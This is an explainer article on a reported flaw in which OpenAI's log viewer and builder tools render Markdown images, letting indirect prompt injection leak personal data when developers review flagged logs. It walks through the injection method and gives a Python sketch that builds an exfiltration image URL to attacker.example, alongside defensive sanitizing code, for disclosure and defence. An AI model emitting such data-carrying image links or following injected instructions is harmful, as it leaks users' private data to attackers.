The Log Viewer Trap: How OpenAI’s Dashboard Can Leak Your Secrets
Imagine a chatbot that works as intended and blocks a dangerous response, yet the data still leaks later from an unexpected place: the developer’s log viewer. Researchers at PromptArmor describe exactly this scenario, claiming that OpenAI’s API log viewer can serve as an exfiltration point for confidential data because of the way the interface renders Markdown images.
The attack relies on indirect prompt injection. Rather than attacking the application directly, an adversary “poisons” an external data source that the AI consumes, such as a web page or third-party content. When a user queries the assistant, the embedded instruction causes the model to produce a response containing a Markdown image. The image’s source URL points to an attacker-controlled domain, and its query parameters are filled with sensitive data from the current context. The URL takes the form attacker.com/img.png?data=..., where the ellipsis is replaced by PII (personally identifiable information), internal documents, or financial details.
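To make the mechanics concrete, here is a minimal Python sketch of how data ends up inside such an image URL and how easily it can be read back out. The domain attacker.example, the alt text, the function names, and the sample value are all hypothetical; the sketch only illustrates the URL shape described above, not the researchers' actual payload.

```python
from urllib.parse import urlencode, urlsplit, parse_qs


def build_image_markdown(base_url: str, context_value: str) -> str:
    """Return a Markdown image whose URL carries context_value as a query parameter."""
    query = urlencode({"data": context_value})  # percent-encodes the value
    return f"![status]({base_url}?{query})"


def read_query_params(url: str) -> dict[str, list[str]]:
    """Decode the query string, as anyone reading the receiving server's logs could."""
    return parse_qs(urlsplit(url).query)


# Hypothetical values, for illustration only.
markdown = build_image_markdown("https://attacker.example/img.png", "passport=X1234567")
url = markdown[markdown.index("(") + 1 : -1]  # text between "(" and the final ")"

print(markdown)
print(read_query_params(url))
```

The point of the sketch is that nothing exotic is involved: any renderer that fetches the image sends the full query string to the host named in the URL.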
In many well-defended applications, such a response never reaches the end user. Developers frequently employ defensive measures such as “judge” models that flag suspicious content, Markdown sanitization, content security policies (CSP) that restrict where images may load from, or plain-text-only output. In the case study provided, the malicious response was in fact intercepted and never rendered in the interface of a KYC (Know Your Customer) service. The vulnerability appears in the next phase: when the flagged dialogue is queued for manual review and a developer opens it in the OpenAI dashboard.
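As a rough illustration of the Markdown sanitization mentioned above, the following Python sketch replaces inline Markdown images with an inert text placeholder before a response is displayed. The pattern and function name are assumptions made for this example; the regular expression covers only the common inline form ![alt](url "title") and does not handle reference-style images or raw HTML img tags, so a production filter would more likely rely on a proper Markdown parser.

```python
import re

# Matches inline Markdown images: ![alt](url) or ![alt](url "title").
# Simplified on purpose: reference-style images and HTML <img> are not covered.
IMAGE_PATTERN = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def strip_markdown_images(text: str) -> str:
    """Replace each inline Markdown image with a plain-text placeholder."""

    def placeholder(match: re.Match) -> str:
        alt_text = match.group(1) or "no alt text"
        return f"[image removed: {alt_text}]"

    return IMAGE_PATTERN.sub(placeholder, text)


sample = "Verification done. ![x](https://attacker.example/img.png?data=abc)"
print(strip_markdown_images(sample))
```

A filter like this protects only the surface where it runs. The raw model output, image link included, can still be stored in logs that another tool renders later.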
The log interfaces for API “responses” and “conversations” render Markdown by default. If an entry contains a Markdown image, the browser tries to fetch it automatically. This is the moment of exfiltration: the browser sends a request to the attacker’s server using the pre-built link, with the secret data embedded in the URL. The domain owner only needs to read their server logs to collect the parameters the model added, which may include passport details or financial data.
Notably, even if an application carefully strips images from Markdown, users often rate anomalous or broken responses as “poor” through feedback mechanisms. Such messages are frequently routed to moderation queues for analysis, which is exactly where a developer viewing the log triggers the image load. The researchers cite Perplexity as an example, where strict sanitization can leave a fragmented response that prompts a negative user rating and, in turn, a manual review.
The researchers further claim that the issue extends beyond the log screens to several OpenAI surfaces used for previewing and testing tools, including Agent Builder, Assistant Builder, Chat Builder, and the ChatKit Playground. All of these reportedly render untrusted Markdown images without sufficient restrictions.
PromptArmor reported its findings through BugCrowd and exchanged clarifications on the report from November 17 to December 4, 2025. The case was ultimately closed with a status of “Not Applicable.” The researchers therefore chose public disclosure to alert organizations that use OpenAI APIs. In this threat model, practical defense goes beyond application-side filters. It also requires organizational safeguards: restricting access to logs, reviewing flagged dialogues in isolated environments without external network access, and treating any rendered Markdown with suspicion, especially when the model has processed external data.
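One way a team might put that suspicion into practice is to scan exported log text for image links before anyone opens it in a Markdown-rendering viewer. The Python sketch below is an assumption-laden example, not a feature of any OpenAI tool: the allowlisted host cdn.example.com, the function name, and the idea of working on exported plain text are all hypothetical.

```python
import re
from urllib.parse import urlsplit

# Captures the URL of inline Markdown images, tolerating an optional "<" wrapper.
IMAGE_URL_PATTERN = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)")

# Hypothetical allowlist of hosts the reviewing team trusts for images.
ALLOWED_IMAGE_HOSTS = frozenset({"cdn.example.com"})


def find_untrusted_image_urls(log_text: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> list[str]:
    """Return image URLs in log_text whose host is not on the allowlist."""
    untrusted = []
    for match in IMAGE_URL_PATTERN.finditer(log_text):
        url = match.group(1)
        host = urlsplit(url).hostname  # None for relative URLs
        if host is not None and host not in allowed_hosts:
            untrusted.append(url)
    return untrusted


entry = (
    "Result ![logo](https://cdn.example.com/logo.png) "
    "and ![s](https://attacker.example/img.png?data=abc)"
)
print(find_untrusted_image_urls(entry))
```

Entries that return a non-empty list could be reviewed as raw text only. Like any regex-based check, this is a coarse first pass and does not replace restricting network access in the review environment.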